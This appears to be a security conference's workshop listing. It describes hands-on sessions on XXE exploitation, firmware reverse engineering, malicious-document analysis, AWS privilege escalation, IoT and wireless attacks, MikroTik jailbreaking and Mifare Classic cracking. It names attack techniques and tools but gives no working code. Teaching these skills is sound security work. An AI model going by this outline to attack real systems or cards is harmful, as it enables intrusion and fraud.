Most pentesters are familiar with XXE vulnerabilities. This workshop’s objective is to sharpen their knowledge and skills in hand-ons exercices. These exercises set up realistic scenarios with particular constraints. Participants are likely to find these same obstacles in a business environment. 

When conducting a penetration test for a web application, knowledge of technology-specific caveats becomes crucial. Knowing vulnerability basics is often insufficient to be effective. In this workshop, the latest XML eXternal Entities (XXE) and XML related attack vectors will be presented. XXE is a vulnerability that affects any XML parser that evaluates external entities. It is gaining more visibility with its introduction to the OWASP Top10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into directory file listing, binary file exfiltration, file write or remote code execution?

The focus of this workshop will be presenting various techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposition to test your skills. For every exercise, sample payloads will be given so that the attendees save some time. 

Requirements for participants: 

HTTP proxy such as Burp - Having Ruby/Python installed to run the sample scripts provided - Private server (optional but recommended) I always provided access to a limited vps for participants who needs it. 

June 19 pm & June 20 pm - Room 34

There’s lots of intro-level material on using radare2. I wanted to do intermediate level how-to. I’ve previously also looked at the open firmware and since it had an open source component it is a good place to start for both 1) not violating any terms and 2) fact-checking reverse engineering work. 

OpenXC builds its firmware – for both the open and proprietary builds – using JSON data structures which define the CAN signals. These definitions are akin to the CAN database files (.dbc) files. Reverse engineering of the open openXC builds (as an educational excersise) reveals that it is a straightforward matter to identify and extract the CAN signal definitions from the binary. Attendees will learn: What are dbc files? How to load raw binaries into r2 (ARM in particular)? How to pretty-print data structures using r2? The exposition of machine code in the talk will be via the free radare2 RE tool. 

June 19 am  - Room 34
June 19 pm - Room 7
June 20 am - Room 34

Most of cyber attacks and Advanced persistent threats (APT) set users as target and exploit documents to compromise victim machines. This workshop will give you a deep knowledge about these kind of attacks and you will be able to hunting threat actors used malicious documents. 

In recent cyber attacks, scams and frauds social engineering was a key attack vector used by cyber criminals. In most social engineering tricks, threat actor has forced victims to open a document to compromise them. This workshop is unique, because at end of it you will be able to analysis infected documents like MS Office or PDFs and find valuable information like: IP addresses, strings, C2 communications, malware type and etc. This workshop will cover the following topics:

- Spreading techniques

- Attack scenarios

- MS-Office structures

- PDF structures

- MS-office Static analysis (Hands-on lab)

- PDF Static analysis (Hands-on lab)

- MS-Office Dynamic analysis (Hands-on lab)

- PDF Dynamic analysis (Hands-on lab)

- Workshop exercises 

In this workshop we will cover all core concepts about APTs, scenarios, documents structure, importance of document malware analysis, static and dynamic techniques. Instructor will give attendees all his experiences in filed of document analysis to help you when you are doing forensic and analysis on malicious document as well. In this workshop we will use a powerful operating system called REMNUX. For more information about REMNUX you can check https://remnux.org/ .

All tools that will be used during the workshop are as follows: - Exiftool - Office malscanner - Office Parser - Oledump - OLEid - OLEVBA - ViperMonkey - Lazy office Analyzer - Fakenet - PDFiD - PDFinfo - PDF-parser - PDFextract - Peepdf - PDFtk - PDF stream dumper - Pyew - Malzilla 

June 19 & June 20 am - Room 33

This workshop shows how tiny misconfigurations in AWS can lead to complete takeover of cloud resources. During the workshop the audience will learn how to detect and exploit the misconfigurations as well as how to defend against such attacks. The workshop consists of 2 parts with hands-on, scenario-based labs. The first part will be focused on privilege escalation scenario: from little vulnerability in the web application to administrator in AWS. The second part will be about finding and exploiting issues related with AWS S3 service: how to detect company resources in cloud and how to automatically scan them in search of valuable information.

More and more companies decide to migrate their services to the Cloud and majority of them choose Amazon Web Services. While DevOps are focused on deploying stable environments, security is not their highest priority. Many of DevOps aren’t aware that little mistakes in configuring AWS can cost you huge amount of money or even kick your company out of the market. 

The workshop is focused on 2 the most common misconfigurations in AWS, which are: improper permissions and data leaks. During the first part you’ll learn how to escalate your privileges using the AWS exploitation framework - Pacu. Then, you'll practice with tools to detect S3 misconfigurations and you’ll learn how to automatically scan the leaked content in search of keys and passwords using the DumpsterDiver. After all you'll go through the same scenarios, but this time from defender perspective, focused on hardening your AWS resources.

June 19 & June 20 pm - Room 32

Recent years have seen a flood of novel wireless exploits, with exploitation moving beyond 802.11, into more obscure standard and proprietary protocols, RF-Exploration and use of SDR to exploit the world we live in, full of interconnected devices is changing the game for both offense and defense. 

What do the Dallas tornado siren attack, hacked electric skateboards, and insecure smart door locks have in common? Vulnerable wireless protocols. The number of IoT devices is growing at an alarming rate. Many of these devices go unnoticed. The problem is that the software used by many of these devices lack basic security measures that we take for granted in regular computer software. Furthermore, security advisories are almost non-existent for IoT.

June 19 pm : Room 69
June 20 pm : Room 33

In this 45 minute workshop you’ll learn how to Jailbreak a MikroTik router, access its internals, and reverse engineer the firmware in these versatile IoT devices. Participants will be provided virtual machines and a limited number of physical devices will be available as well. 

MikroTik, one of the fastest growing networking equipment companies, puts RouterOS on most of their products, including home and top-tier routers.

In this workshop we will be working with free & open-source toolsets to kickstart you on reverse engineering RouterOS. All levels of audience are welcome, as we will start with using simple, pre-made scripts to jailbreak the device, and progress to more complicated topics of looking at NPK and supout.rif file formats and reverse engineering their code.

Please bring your own laptops and download VirtualBox + a pre-made virtual machine from:

- https://www.virtualbox.org/wiki/Downloads

- https://download.mikrotik.com/routeros/6.43.2/mikrotik-6.43.2.iso

Most of the tools are available on: https://github.com/0ki/mikrotik-tools 

June 19 am & June 20 am - Room 7

You will learn how to create own BLE device using inexpensive hardware, and how to interact with it from your laptop or mobile phone. Following the workshop, you will be able to try more advanced topics (e.g. sniffing and attacking your device), using provided “homework” materials.  

Bluetooth Low Energy (Smart, 4) is one of the most common and rapidly growing IoT technologies. Unfortunatelly the prevalence of technology does not come with security. Alarming vulnerabilities in BLE smart locks, medical devices and banking tokens are revealed day by day. And yet, the knowledge on how to comprehensively assess them seems very uncommon. In this workshop you will get familiar with the very basics of BLE. We will work on a dedicated, readily available BLE hardware nRF devkit device. You will turn into embedded developer and learn how to program and flash it yourself, using special web interface and ready templates. Next, we will interact with it using Linux command-line and free mobile application. More advanced topics (including sniffing, intercepting, attacking) will be left for you as a homework. 

Please bring: 

- laptop capable of running Kali Linux in VM, and at least one USB port 

- smartphone (preferably Android)  

Despite several vulnerabilities and upgrade advisories published years ago, Mifare Classic is still surprisingly often used for access control, bus tickets, loyalty cards or e-wallets. 

During this workshop, you will learn how to crack and clone it using just a mobile phone or an inexpensive hardware.  

We will cover: 

- Mifare Classic introduction: keys, security, data sectors, blocks 

- brute-force of the common, dictionary keys using Mifare Classic Tool and mobile phone 

- cracking Mifare Classic and Mifare Classic EV1 using nested, darkside and hardnested attacks (libnfc PN532) 

Please bring:

- A laptop capable of running Kali Linux in VM, and at least one USB port. 

- Android phone with NFC (NXP chipset, most current phones). 

- You can bring your own Mifare Classic tag to check its security.  

June 19 am & June 20 am - Room 69